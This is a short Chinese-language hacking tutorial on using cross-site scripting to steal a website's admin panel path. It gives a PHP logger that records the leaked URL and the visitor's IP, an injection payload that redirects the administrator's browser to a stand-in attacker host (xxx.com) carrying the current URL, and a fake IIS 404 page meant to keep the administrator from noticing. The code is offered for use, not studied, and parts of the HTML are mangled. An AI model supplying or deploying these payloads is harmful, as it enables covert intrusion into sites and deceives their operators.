xss获取后台路径代码

PHP接收代码cun.php：
[pre]<?&nbsp;$cun=&quot;URL:&quot;.$_GET[&quot;admin_name&quot;].&quot;--ip:&quot;.$HTTP_SERVER_VARS[&quot;REMOTE_ADDR&quot;].&quot;--&quot;.date(&quot;Y-m-d&nbsp;H:i:s&quot;).&quot;\r\n&quot;;&nbsp;fwrite(fopen(&quot;CUN.txt&quot;,&quot;ab&quot;),$cun);&nbsp;?>&nbsp;[/pre]


用于XSS的代码
&quot;/><script>location.href=&quot;http://xxx.com/cun.php?&quot;+window.location.href;</script><inputtype=&quot;hidden&quot;name=&quot;
上面的的能够对付很多存在XSS的地方，这个XSS代码存在的缺点就是管理员后台打开直接就会跳到你接收后台地址的PHP地址页，所以为了迷惑管理员，在PHP最下面加上代码如下：
<!DOCTYPEHTMLPUBLIC&quot;-//W3C//DTDHTML4.01//EN&quot;&quot;http://www.w3.org/TR/html4/strict.dtd&quot;>

<HTML><HEAD><TITLE>无法找到该页</TITLE>

<METAHTTP-EQUIV=&quot;Content-Type&quot;Content=&quot;text/html;charset=GB2312&quot;>

<STYLEtype=&quot;text/css&quot;>

BODY{font:9pt/12pt宋体}

H1{font:12pt/15pt宋体}

H2{font:9pt/12pt宋体}

A:link{color:red}

A:visited{color:maroon}

</STYLE>

</HEAD><BODY><TABLEwidth=500border=0cellspacing=10><TR><TD>
<h1>无法找到该页</h1>

您正在搜索的页面可能已经删除、更名或暂时不可用。

<hr>

<p>请尝试以下操作：</p>

<ul>

<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>

<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。

</li>

<li>单击<ahref=&quot;javascript:history.back(1)&quot;>后退</a>按钮尝试另一个链接。</li>

</ul>

<h2>HTTP错误404-文件或目录未找到。<br>Internet信息服务(IIS)</h2>

<hr>

<p>技术信息（为技术支持人员提供）</p>

<ul>

<li>转到<ahref=&quot;http://go.microsoft.com/fwlink/?linkid=8180&quot;>Microsoft产品支持服务</a>并搜索包括&ldquo;HTTP&rdquo;和&ldquo;404&rdquo;的标题。</li>

<li>打开&ldquo;IIS帮助&rdquo;（可在IIS管理器(inetmgr)中访问），然后搜索标题为&ldquo;网站设置&rdquo;、&ldquo;常规管理任务&rdquo;和&ldquo;关于自定义错误消息&rdquo;的主题。</li>

</ul>
</TD></TR></TABLE></BODY></HTML>

*